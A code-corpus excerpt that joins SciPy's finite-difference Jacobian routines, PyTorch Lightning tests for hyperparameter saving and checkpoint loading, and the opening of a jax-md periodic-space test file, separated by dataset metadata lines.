sparsity structure, use `group_columns` to obtain it.
A single array or a sparse matrix is interpreted as a sparsity
structure, and groups are computed inside the function. A tuple is
interpreted as (structure, groups). If None (default), a standard
dense differencing will be used.
Note, that sparse differencing makes sense only for large Jacobian
matrices where each row contains few non-zero elements.
as_linear_operator : bool, optional
When True the function returns an `scipy.sparse.linalg.LinearOperator`.
Otherwise it returns a dense array or a sparse matrix depending on
`sparsity`. The linear operator provides an efficient way of computing
``J.dot(p)`` for any vector ``p`` of shape (n,), but does not allow
direct access to individual elements of the matrix. By default
`as_linear_operator` is False.
args, kwargs : tuple and dict, optional
Additional arguments passed to `fun`. Both empty by default.
The calling signature is ``fun(x, *args, **kwargs)``.
Returns
-------
J : {ndarray, sparse matrix, LinearOperator}
Finite difference approximation of the Jacobian matrix.
If `as_linear_operator` is True returns a LinearOperator
with shape (m, n). Otherwise it returns a dense array or sparse
matrix depending on how `sparsity` is defined. If `sparsity`
is None then a ndarray with shape (m, n) is returned. If
`sparsity` is not None returns a csr_matrix with shape (m, n).
For sparse matrices and linear operators it is always returned as
a 2-D structure, for ndarrays, if m=1 it is returned
as a 1-D gradient array with shape (n,).
See Also
--------
check_derivative : Check correctness of a function computing derivatives.
Notes
-----
If `rel_step` is not provided, it assigned to ``EPS**(1/s)``, where EPS is
machine epsilon for float64 numbers, s=2 for '2-point' method and s=3 for
'3-point' method. Such relative step approximately minimizes a sum of
truncation and round-off errors, see [1]_.
A finite difference scheme for '3-point' method is selected automatically.
The well-known central difference scheme is used for points sufficiently
far from the boundary, and 3-point forward or backward scheme is used for
points near the boundary. Both schemes have the second-order accuracy in
terms of Taylor expansion. Refer to [2]_ for the formulas of 3-point
forward and backward difference schemes.
For dense differencing when m=1 Jacobian is returned with a shape (n,),
on the other hand when n=1 Jacobian is returned with a shape (m, 1).
Our motivation is the following: a) It handles a case of gradient
computation (m=1) in a conventional way. b) It clearly separates these two
different cases. b) In all cases np.atleast_2d can be called to get 2-D
Jacobian with correct dimensions.
References
----------
.. [1] W. H. Press et. al. "Numerical Recipes. The Art of Scientific
Computing. 3rd edition", sec. 5.7.
.. [2] <NAME>, <NAME>, and <NAME>, "On the estimation of
sparse Jacobian matrices", Journal of the Institute of Mathematics
and its Applications, 13 (1974), pp. 117-120.
.. [3] <NAME>, "Generation of Finite Difference Formulas on
Arbitrarily Spaced Grids", Mathematics of Computation 51, 1988.
Examples
--------
>>> import numpy as np
>>> from scipy.optimize import approx_derivative
>>>
>>> def f(x, c1, c2):
... return np.array([x[0] * np.sin(c1 * x[1]),
... x[0] * np.cos(c2 * x[1])])
...
>>> x0 = np.array([1.0, 0.5 * np.pi])
>>> approx_derivative(f, x0, args=(1, 2))
array([[ 1., 0.],
[-1., 0.]])
Bounds can be used to limit the region of function evaluation.
In the example below we compute left and right derivative at point 1.0.
>>> def g(x):
... return x**2 if x >= 1 else x
...
>>> x0 = 1.0
>>> approx_derivative(g, x0, bounds=(-np.inf, 1.0))
array([ 1.])
>>> approx_derivative(g, x0, bounds=(1.0, np.inf))
array([ 2.])
"""
if method not in ['2-point', '3-point', 'cs']:
raise ValueError("Unknown method '%s'. " % method)
x0 = np.atleast_1d(x0)
if x0.ndim > 1:
raise ValueError("`x0` must have at most 1 dimension.")
lb, ub = _prepare_bounds(bounds, x0)
if lb.shape != x0.shape or ub.shape != x0.shape:
raise ValueError("Inconsistent shapes between bounds and `x0`.")
if as_linear_operator and not (np.all(np.isinf(lb))
and np.all(np.isinf(ub))):
raise ValueError("Bounds not supported when "
"`as_linear_operator` is True.")
def fun_wrapped(x):
f = np.atleast_1d(fun(x, *args, **kwargs))
if f.ndim > 1:
raise RuntimeError("`fun` return value has "
"more than 1 dimension.")
return f
if f0 is None:
f0 = fun_wrapped(x0)
else:
f0 = np.atleast_1d(f0)
if f0.ndim > 1:
raise ValueError("`f0` passed has more than 1 dimension.")
if np.any((x0 < lb) | (x0 > ub)):
raise ValueError("`x0` violates bound constraints.")
if as_linear_operator:
if rel_step is None:
rel_step = relative_step[method]
return _linear_operator_difference(fun_wrapped, x0,
f0, rel_step, method)
else:
h = _compute_absolute_step(rel_step, x0, method)
if method == '2-point':
h, use_one_sided = _adjust_scheme_to_bounds(
x0, h, 1, '1-sided', lb, ub)
elif method == '3-point':
h, use_one_sided = _adjust_scheme_to_bounds(
x0, h, 1, '2-sided', lb, ub)
elif method == 'cs':
use_one_sided = False
if sparsity is None:
return _dense_difference(fun_wrapped, x0, f0, h,
use_one_sided, method)
else:
if not issparse(sparsity) and len(sparsity) == 2:
structure, groups = sparsity
else:
structure = sparsity
groups = group_columns(sparsity)
if issparse(structure):
structure = csc_matrix(structure)
else:
structure = np.atleast_2d(structure)
groups = np.atleast_1d(groups)
return _sparse_difference(fun_wrapped, x0, f0, h,
use_one_sided, structure,
groups, method)
def _linear_operator_difference(fun, x0, f0, h, method):
m = f0.size
n = x0.size
if method == '2-point':
def matvec(p):
if np.array_equal(p, np.zeros_like(p)):
return np.zeros(m)
dx = h / norm(p)
x = x0 + dx*p
df = fun(x) - f0
return df / dx
elif method == '3-point':
def matvec(p):
if np.array_equal(p, np.zeros_like(p)):
return np.zeros(m)
dx = 2*h / norm(p)
x1 = x0 - (dx/2)*p
x2 = x0 + (dx/2)*p
f1 = fun(x1)
f2 = fun(x2)
df = f2 - f1
return df / dx
elif method == 'cs':
def matvec(p):
if np.array_equal(p, np.zeros_like(p)):
return np.zeros(m)
dx = h / norm(p)
x = x0 + dx*p*1.j
f1 = fun(x)
df = f1.imag
return df / dx
else:
raise RuntimeError("Never be here.")
return LinearOperator((m, n), matvec)
def _dense_difference(fun, x0, f0, h, use_one_sided, method):
m = f0.size
n = x0.size
J_transposed = np.empty((n, m))
h_vecs = np.diag(h)
for i in range(h.size):
if method == '2-point':
x = x0 + h_vecs[i]
dx = x[i] - x0[i] # Recompute dx as exactly representable number.
df = fun(x) - f0
elif method == '3-point' and use_one_sided[i]:
x1 = x0 + h_vecs[i]
x2 = x0 + 2 * h_vecs[i]
dx = x2[i] - x0[i]
f1 = fun(x1)
f2 = fun(x2)
df = -3.0 * f0 + 4 * f1 - f2
elif method == '3-point' and not use_one_sided[i]:
x1 = x0 - h_vecs[i]
x2 = x0 + h_vecs[i]
dx = x2[i] - x1[i]
f1 = fun(x1)
f2 = fun(x2)
df = f2 - f1
elif method == 'cs':
f1 = fun(x0 + h_vecs[i]*1.j)
df = f1.imag
dx = h_vecs[i, i]
else:
raise RuntimeError("Never be here.")
J_transposed[i] = df / dx
if m == 1:
J_transposed = np.ravel(J_transposed)
return J_transposed.T
def _sparse_difference(fun, x0, f0, h, use_one_sided,
structure, groups, method):
m = f0.size
n = x0.size
row_indices = []
col_indices = []
fractions = []
n_groups = np.max(groups) + 1
for group in range(n_groups):
# Perturb variables which are in the same group simultaneously.
e = np.equal(group, groups)
h_vec = h * e
if method == '2-point':
x = x0 + h_vec
dx = x - x0
df = fun(x) - f0
# The result is written to columns which correspond to perturbed
# variables.
cols, = np.nonzero(e)
# Find all non-zero elements in selected columns of Jacobian.
i, j, _ = find(structure[:, cols])
# Restore column indices in the full array.
j = cols[j]
elif method == '3-point':
# Here we do conceptually the same but separate one-sided
# and two-sided schemes.
x1 = x0.copy()
x2 = x0.copy()
mask_1 = use_one_sided & e
x1[mask_1] += h_vec[mask_1]
x2[mask_1] += 2 * h_vec[mask_1]
mask_2 = ~use_one_sided & e
x1[mask_2] -= h_vec[mask_2]
x2[mask_2] += h_vec[mask_2]
dx = np.zeros(n)
dx[mask_1] = x2[mask_1] - x0[mask_1]
dx[mask_2] = x2[mask_2] - x1[mask_2]
f1 = fun(x1)
f2 = fun(x2)
cols, = np.nonzero(e)
i, j, _ = find(structure[:, cols])
j = cols[j]
mask = use_one_sided[j]
df = np.empty(m)
rows = i[mask]
df[rows] = -3 * f0[rows] + 4 * f1[rows] - f2[rows]
rows = i[~mask]
df[rows] = f2[rows] - f1[rows]
elif method == 'cs':
f1 = fun(x0 + h_vec*1.j)
df = f1.imag
dx = h_vec
cols, = np.nonzero(e)
i, j, _ = find(structure[:, cols])
j = cols[j]
else:
raise ValueError("Never be here.")
# All that's left is to compute the fraction. We store i, j and
# fractions as separate arrays and later construct coo_matrix.
row_indices.append(i)
col_indices.append(j)
fractions.append(df[i] / dx[j])
row_indices = np.hstack(row_indices)
col_indices = np.hstack(col_indices)
fractions = np.hstack(fractions)
J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n))
return csr_matrix(J)
def check_derivative(fun, jac, x0, bounds=(-np.inf, np.inf), args=(),
kwargs={}):
"""Check correctness of a function computing derivatives (Jacobian or
gradient) by comparison with a finite difference approximation.
Parameters
----------
fun : callable
Function of which to estimate the derivatives. The argument x
passed to this function is ndarray of shape (n,) (never a scalar
even if n=1). It must return 1-D array_like of shape (m,) or a scalar.
jac : callable
Function which computes Jacobian matrix of `fun`. It must work with
argument x the same way as `fun`. The return value must be array_like
or sparse matrix with an appropriate shape.
x0 : array_like of shape (n,) or float
Point at which to estimate the derivatives. Float will be converted
to 1-D array.
bounds : 2-tuple of array_like, optional
Lower and upper bounds on independent variables. Defaults to no bounds.
Each bound must match the size of `x0` or be a scalar, in the latter
case the bound will be the same for all variables. Use it to limit the
range of function evaluation.
args, kwargs : tuple and dict, optional
Additional arguments passed to `fun` and `jac`. Both empty by default.
The calling signature is ``fun(x, *args, **kwargs)`` and the same
for `jac`.
Returns
-------
accuracy : float
The maximum among all relative errors for elements with absolute values
higher than 1 and absolute errors for elements with absolute values
less or equal than 1. If `accuracy` is on the order of 1e-6 or lower,
then it is likely that your `jac` implementation is correct.
See Also
--------
approx_derivative : Compute finite difference approximation of derivative.
Examples
--------
>>> import numpy as np
>>> from scipy.optimize import check_derivative
>>>
>>>
>>> def f(x, c1, c2):
... return np.array([x[0] * np.sin(c1 * x[1]),
... x[0] * np.cos(c2 * x[1])])
...
>>> def jac(x, c1, c2):
... return np.array([
... [np.sin(c1 * x[1]), c1 * x[0] * np.cos(c1 * x[1])],
... [np.cos(c2 * x[1]), -c2 * x[0] * np.sin(c2 * x[1])]
... ])
...
>>>
>>> x0 = np.array([1.0, 0.5 * np.pi])
>>> check_derivative(f, jac, x0, args=(1, 2))
2.4492935982947064e-16
"""
J_to_test = jac(x0, *args, **kwargs)
if issparse(J_to_test):
J_diff = approx_derivative(fun, x0, bounds=bounds, sparsity=J_to_test,
args=args, kwargs=kwargs)
J_to_test = csr_matrix(J_to_test)
abs_err = J_to_test - J_diff
i, j, abs_err_data = find(abs_err)
J_diff_data = np.asarray(J_diff[i, j]).ravel()
return np.max(np.abs(abs_err_data) /
np.maximum(1, np.abs(J_diff_data)))
else:
J_diff = approx_derivative(fun, x0, bounds=bounds,
args=args, kwargs=kwargs)
abs_err = np.abs(J_to_test - J_diff)
return np.max(abs_err / np.maximum(1, np.abs(J_diff)))
| 2.890625 | 3 |
tests/models/test_hparams.py | abhinavg97/pytorch-lightning | 1 | 1266 | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
from argparse import Namespace
import cloudpickle
import pytest
import torch
from fsspec.implementations.local import LocalFileSystem
from omegaconf import OmegaConf, Container
from torch.nn import functional as F
from torch.utils.data import DataLoader
from pytorch_lightning import Trainer, LightningModule
from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml
from pytorch_lightning.utilities import AttributeDict, is_picklable
from tests.base import EvalModelTemplate, TrialMNIST, BoringModel
class SaveHparamsModel(EvalModelTemplate):
""" Tests that a model can take an object """
def __init__(self, hparams):
super().__init__()
self.save_hyperparameters(hparams)
class AssignHparamsModel(EvalModelTemplate):
""" Tests that a model can take an object with explicit setter """
def __init__(self, hparams):
super().__init__()
self.hparams = hparams
# -------------------------
# STANDARD TESTS
# -------------------------
def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False):
"""
Tests for the existence of an arg 'test_arg=14'
"""
hparam_type = type(model.hparams)
# test proper property assignments
assert model.hparams.test_arg == 14
# verify we can train
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2)
trainer.fit(model)
# make sure the raw checkpoint saved the properties
raw_checkpoint_path = _raw_checkpoint_path(trainer)
raw_checkpoint = torch.load(raw_checkpoint_path)
assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint
assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14
# verify that model loads correctly
model2 = cls.load_from_checkpoint(raw_checkpoint_path)
assert model2.hparams.test_arg == 14
assert isinstance(model2.hparams, hparam_type)
if try_overwrite:
# verify that we can overwrite the property
model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78)
assert model3.hparams.test_arg == 78
return raw_checkpoint_path
@pytest.mark.parametrize("cls", [SaveHparamsModel, AssignHparamsModel])
def test_namespace_hparams(tmpdir, cls):
# init model
model = cls(hparams=Namespace(test_arg=14))
# run standard test suite
_run_standard_hparams_test(tmpdir, model, cls)
@pytest.mark.parametrize("cls", [SaveHparamsModel, AssignHparamsModel])
def test_dict_hparams(tmpdir, cls):
# init model
model = cls(hparams={'test_arg': 14})
# run standard test suite
_run_standard_hparams_test(tmpdir, model, cls)
@pytest.mark.parametrize("cls", [SaveHparamsModel, AssignHparamsModel])
def test_omega_conf_hparams(tmpdir, cls):
# init model
conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)]))
model = cls(hparams=conf)
assert isinstance(model.hparams, Container)
# run standard test suite
raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls)
model2 = cls.load_from_checkpoint(raw_checkpoint_path)
assert isinstance(model2.hparams, Container)
# config specific tests
assert model2.hparams.test_arg == 14
assert model2.hparams.mylist[0] == 15.4
def test_explicit_args_hparams(tmpdir):
"""
Tests that a model can take implicit args and assign
"""
# define model
class LocalModel(EvalModelTemplate):
def __init__(self, test_arg, test_arg2):
super().__init__()
self.save_hyperparameters('test_arg', 'test_arg2')
model = LocalModel(test_arg=14, test_arg2=90)
# run standard test suite
raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel)
model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120)
# config specific tests
assert model.hparams.test_arg2 == 120
def test_implicit_args_hparams(tmpdir):
"""
Tests that a model can take regular args and assign
"""
# define model
class LocalModel(EvalModelTemplate):
def __init__(self, test_arg, test_arg2):
super().__init__()
self.save_hyperparameters()
model = LocalModel(test_arg=14, test_arg2=90)
# run standard test suite
raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel)
model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120)
# config specific tests
assert model.hparams.test_arg2 == 120
def test_explicit_missing_args_hparams(tmpdir):
"""
Tests that a model can take regular args and assign
"""
# define model
class LocalModel(EvalModelTemplate):
def __init__(self, test_arg, test_arg2):
super().__init__()
self.save_hyperparameters('test_arg')
model = LocalModel(test_arg=14, test_arg2=90)
# test proper property assignments
assert model.hparams.test_arg == 14
# verify we can train
trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)
trainer.fit(model)
# make sure the raw checkpoint saved the properties
raw_checkpoint_path = _raw_checkpoint_path(trainer)
raw_checkpoint = torch.load(raw_checkpoint_path)
assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint
assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14
# verify that model loads correctly
model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123)
assert model.hparams.test_arg == 14
assert 'test_arg2' not in model.hparams # test_arg2 is not registered in class init
return raw_checkpoint_path
# -------------------------
# SPECIFIC TESTS
# -------------------------
def test_class_nesting():
class MyModule(LightningModule):
def forward(self):
...
# make sure PL modules are always nn.Module
a = MyModule()
assert isinstance(a, torch.nn.Module)
def test_outside():
a = MyModule()
_ = a.hparams
class A:
def test(self):
a = MyModule()
_ = a.hparams
def test2(self):
test_outside()
test_outside()
A().test2()
A().test()
class SubClassEvalModel(EvalModelTemplate):
any_other_loss = torch.nn.CrossEntropyLoss()
def __init__(self, *args, subclass_arg=1200, **kwargs):
super().__init__(*args, **kwargs)
self.save_hyperparameters()
class SubSubClassEvalModel(SubClassEvalModel):
pass
class AggSubClassEvalModel(SubClassEvalModel):
def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs):
super().__init__(*args, **kwargs)
self.save_hyperparameters()
class UnconventionalArgsEvalModel(EvalModelTemplate):
""" A model that has unconventional names for "self", "*args" and "**kwargs". """
def __init__(obj, *more_args, other_arg=300, **more_kwargs):
# intentionally named obj
super().__init__(*more_args, **more_kwargs)
obj.save_hyperparameters()
class DictConfSubClassEvalModel(SubClassEvalModel):
def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs):
super().__init__(*args, **kwargs)
self.save_hyperparameters()
@pytest.mark.parametrize("cls", [
EvalModelTemplate,
SubClassEvalModel,
SubSubClassEvalModel,
AggSubClassEvalModel,
UnconventionalArgsEvalModel,
DictConfSubClassEvalModel,
])
def test_collect_init_arguments(tmpdir, cls):
""" Test that the model automatically saves the arguments passed into the constructor """
extra_args = {}
if cls is AggSubClassEvalModel:
extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss())
elif cls is DictConfSubClassEvalModel:
extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything')))
model = cls(**extra_args)
assert model.hparams.batch_size == 32
model = cls(batch_size=179, **extra_args)
assert model.hparams.batch_size == 179
if isinstance(model, SubClassEvalModel):
assert model.hparams.subclass_arg == 1200
if isinstance(model, AggSubClassEvalModel):
assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss)
# verify that the checkpoint saved the correct values
trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)
trainer.fit(model)
raw_checkpoint_path = _raw_checkpoint_path(trainer)
raw_checkpoint = torch.load(raw_checkpoint_path)
assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint
assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179
# verify that model loads correctly
model = cls.load_from_checkpoint(raw_checkpoint_path)
assert model.hparams.batch_size == 179
if isinstance(model, AggSubClassEvalModel):
assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss)
if isinstance(model, DictConfSubClassEvalModel):
assert isinstance(model.hparams.dict_conf, Container)
assert model.hparams.dict_conf['my_param'] == 'anything'
# verify that we can overwrite whatever we want
model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99)
assert model.hparams.batch_size == 99
def _raw_checkpoint_path(trainer) -> str:
raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath)
raw_checkpoint_paths = [x for x in raw_checkpoint_paths if '.ckpt' in x]
assert raw_checkpoint_paths
raw_checkpoint_path = raw_checkpoint_paths[0]
raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path)
return raw_checkpoint_path
class LocalVariableModelSuperLast(EvalModelTemplate):
""" This model has the super().__init__() call at the end. """
def __init__(self, arg1, arg2, *args, **kwargs):
self.argument1 = arg1 # arg2 intentionally not set
arg1 = 'overwritten'
local_var = 1234
super().__init__(*args, **kwargs) # this is intentionally here at the end
class LocalVariableModelSuperFirst(EvalModelTemplate):
""" This model has the _auto_collect_arguments() call at the end. """
def __init__(self, arg1, arg2, *args, **kwargs):
super().__init__(*args, **kwargs)
self.argument1 = arg1 # arg2 intentionally not set
arg1 = 'overwritten'
local_var = 1234
self.save_hyperparameters() # this is intentionally here at the end
@pytest.mark.parametrize("cls", [
LocalVariableModelSuperFirst,
# LocalVariableModelSuperLast,
])
def test_collect_init_arguments_with_local_vars(cls):
""" Tests that only the arguments are collected and not local variables. """
model = cls(arg1=1, arg2=2)
assert 'local_var' not in model.hparams
assert model.hparams['arg1'] == 'overwritten'
assert model.hparams['arg2'] == 2
# @pytest.mark.parametrize("cls,config", [
# (SaveHparamsModel, Namespace(my_arg=42)),
# (SaveHparamsModel, dict(my_arg=42)),
# (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))),
# (AssignHparamsModel, Namespace(my_arg=42)),
# (AssignHparamsModel, dict(my_arg=42)),
# (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))),
# ])
# def test_single_config_models(tmpdir, cls, config):
# """ Test that the model automatically saves the arguments passed into the constructor """
# model = cls(config)
#
# # no matter how you do it, it should be assigned
# assert model.hparams.my_arg == 42
#
# # verify that the checkpoint saved the correct values
# trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)
# trainer.fit(model)
#
# # verify that model loads correctly
# raw_checkpoint_path = _raw_checkpoint_path(trainer)
# model = cls.load_from_checkpoint(raw_checkpoint_path)
# assert model.hparams.my_arg == 42
class AnotherArgModel(EvalModelTemplate):
def __init__(self, arg1):
super().__init__()
self.save_hyperparameters(arg1)
class OtherArgsModel(EvalModelTemplate):
def __init__(self, arg1, arg2):
super().__init__()
self.save_hyperparameters(arg1, arg2)
@pytest.mark.parametrize("cls,config", [
(AnotherArgModel, dict(arg1=42)),
(OtherArgsModel, dict(arg1=3.14, arg2='abc')),
])
def test_single_config_models_fail(tmpdir, cls, config):
""" Test fail on passing unsupported config type. """
with pytest.raises(ValueError):
_ = cls(**config)
@pytest.mark.parametrize("past_key", ['module_arguments'])
def test_load_past_checkpoint(tmpdir, past_key):
model = EvalModelTemplate()
# verify we can train
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)
trainer.fit(model)
# make sure the raw checkpoint saved the properties
raw_checkpoint_path = _raw_checkpoint_path(trainer)
raw_checkpoint = torch.load(raw_checkpoint_path)
raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]
raw_checkpoint['hparams_type'] = 'Namespace'
raw_checkpoint[past_key]['batch_size'] = -17
del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]
# save back the checkpoint
torch.save(raw_checkpoint, raw_checkpoint_path)
# verify that model loads correctly
model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path)
assert model2.hparams.batch_size == -17
def test_hparams_pickle(tmpdir):
ad = AttributeDict({'key1': 1, 'key2': 'abc'})
pkl = pickle.dumps(ad)
assert ad == pickle.loads(pkl)
pkl = cloudpickle.dumps(ad)
assert ad == pickle.loads(pkl)
class UnpickleableArgsEvalModel(EvalModelTemplate):
""" A model that has an attribute that cannot be pickled. """
def __init__(self, foo='bar', pickle_me=(lambda x: x + 1), **kwargs):
super().__init__(**kwargs)
assert not is_picklable(pickle_me)
self.save_hyperparameters()
def test_hparams_pickle_warning(tmpdir):
model = UnpickleableArgsEvalModel()
trainer = Trainer(default_root_dir=tmpdir, max_steps=1)
with pytest.warns(UserWarning, match="attribute 'pickle_me' removed from hparams because it cannot be pickled"):
trainer.fit(model)
assert 'pickle_me' not in model.hparams
def test_hparams_save_yaml(tmpdir):
hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here',
nasted=dict(any_num=123, anystr='abcd'))
path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml')
save_hparams_to_yaml(path_yaml, hparams)
assert load_hparams_from_yaml(path_yaml) == hparams
save_hparams_to_yaml(path_yaml, Namespace(**hparams))
assert load_hparams_from_yaml(path_yaml) == hparams
save_hparams_to_yaml(path_yaml, AttributeDict(hparams))
assert load_hparams_from_yaml(path_yaml) == hparams
save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams))
assert load_hparams_from_yaml(path_yaml) == hparams
class NoArgsSubClassEvalModel(EvalModelTemplate):
def __init__(self):
super().__init__()
class SimpleNoArgsModel(LightningModule):
def __init__(self):
super().__init__()
self.l1 = torch.nn.Linear(28 * 28, 10)
def forward(self, x):
return torch.relu(self.l1(x.view(x.size(0), -1)))
def training_step(self, batch, batch_nb):
x, y = batch
loss = F.cross_entropy(self(x), y)
return {'loss': loss, 'log': {'train_loss': loss}}
def test_step(self, batch, batch_nb):
x, y = batch
loss = F.cross_entropy(self(x), y)
return {'loss': loss, 'log': {'train_loss': loss}}
def configure_optimizers(self):
return torch.optim.Adam(self.parameters(), lr=0.02)
@pytest.mark.parametrize("cls", [
SimpleNoArgsModel,
NoArgsSubClassEvalModel,
])
def test_model_nohparams_train_test(tmpdir, cls):
"""Test models that do not tae any argument in init."""
model = cls()
trainer = Trainer(
max_epochs=1,
default_root_dir=tmpdir,
)
train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32)
trainer.fit(model, train_loader)
test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32)
trainer.test(test_dataloaders=test_loader)
def test_model_ignores_non_exist_kwargument(tmpdir):
"""Test that the model takes only valid class arguments."""
class LocalModel(EvalModelTemplate):
def __init__(self, batch_size=15):
super().__init__(batch_size=batch_size)
self.save_hyperparameters()
model = LocalModel()
assert model.hparams.batch_size == 15
# verify that the checkpoint saved the correct values
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)
trainer.fit(model)
# verify that we can overwrite whatever we want
raw_checkpoint_path = _raw_checkpoint_path(trainer)
model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99)
assert 'non_exist_kwarg' not in model.hparams
class SuperClassPositionalArgs(EvalModelTemplate):
def __init__(self, hparams):
super().__init__()
self._hparams = None # pretend EvalModelTemplate did not call self.save_hyperparameters()
self.hparams = hparams
class SubClassVarArgs(SuperClassPositionalArgs):
""" Loading this model should accept hparams and init in the super class """
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def test_args(tmpdir):
""" Test for inheritance: super class takes positional arg, subclass takes varargs. """
hparams = dict(test=1)
model = SubClassVarArgs(hparams)
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)
trainer.fit(model)
raw_checkpoint_path = _raw_checkpoint_path(trainer)
with pytest.raises(TypeError, match="__init__\(\) got an unexpected keyword argument 'test'"):
SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path)
class RuntimeParamChangeModelSaving(BoringModel):
def __init__(self, **kwargs):
super().__init__()
self.save_hyperparameters()
class RuntimeParamChangeModelAssign(BoringModel):
def __init__(self, **kwargs):
super().__init__()
self.hparams = kwargs
@pytest.mark.parametrize("cls", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign])
def test_init_arg_with_runtime_change(tmpdir, cls):
"""Test that we save/export only the initial hparams, no other runtime change allowed"""
model = cls(running_arg=123)
assert model.hparams.running_arg == 123
model.hparams.running_arg = -1
assert model.hparams.running_arg == -1
model.hparams = Namespace(abc=42)
assert model.hparams.abc == 42
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
limit_test_batches=2,
max_epochs=1,
)
trainer.fit(model)
path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE)
hparams = load_hparams_from_yaml(path_yaml)
assert hparams.get('running_arg') == 123
class UnsafeParamModel(BoringModel):
def __init__(self, my_path, any_param=123):
super().__init__()
self.save_hyperparameters()
def test_model_with_fsspec_as_parameter(tmpdir):
model = UnsafeParamModel(LocalFileSystem(tmpdir))
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
limit_test_batches=2,
max_epochs=1,
)
trainer.fit(model)
trainer.test()
| 2.046875 | 2 |
tests/space_test.py | hadrianmontes/jax-md | 713 | 1267 | <reponame>hadrianmontes/jax-md<gh_stars>100-1000
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for jax_md.space."""
from absl.testing import absltest
from absl.testing import parameterized
from jax.config import config as jax_config
from jax import random
import jax.numpy as jnp
from jax import grad, jit, jacfwd
from jax import test_util as jtu
from jax_md import space, test_util, quantity, energy
from jax_md.util import *
from functools import partial
from unittest import SkipTest
test_util.update_test_tolerance(5e-5, 5e-13)
jax_config.parse_flags_with_absl()
jax_config.enable_omnistaging()
FLAGS = jax_config.FLAGS
PARTICLE_COUNT = 10
STOCHASTIC_SAMPLES = 10
SHIFT_STEPS = 10
SPATIAL_DIMENSION = [2, 3]
BOX_FORMATS = ['scalar', 'vector', 'matrix']
if FLAGS.jax_enable_x64:
POSITION_DTYPE = [f32, f64]
else:
POSITION_DTYPE = [f32]
def make_periodic_general_test_system(N, dim, dtype, box_format):
assert box_format in BOX_FORMATS
box_size = quantity.box_size_at_number_density(N, 1.0, dim)
box = dtype(box_size)
if box_format == 'vector':
box = jnp.array(jnp.ones(dim) * box_size, dtype)
elif box_format == 'matrix':
box = jnp.array(jnp.eye(dim) * box_size, dtype)
d, s = space.periodic(jnp.diag(box) if box_format == 'matrix' else box)
d_gf, s_gf = space.periodic_general(box)
d_g, s_g = space.periodic_general(box, fractional_coordinates=False)
key = random.PRNGKey(0)
R_f = random.uniform(key, (N, dim), dtype=dtype)
R = space.transform(box, R_f)
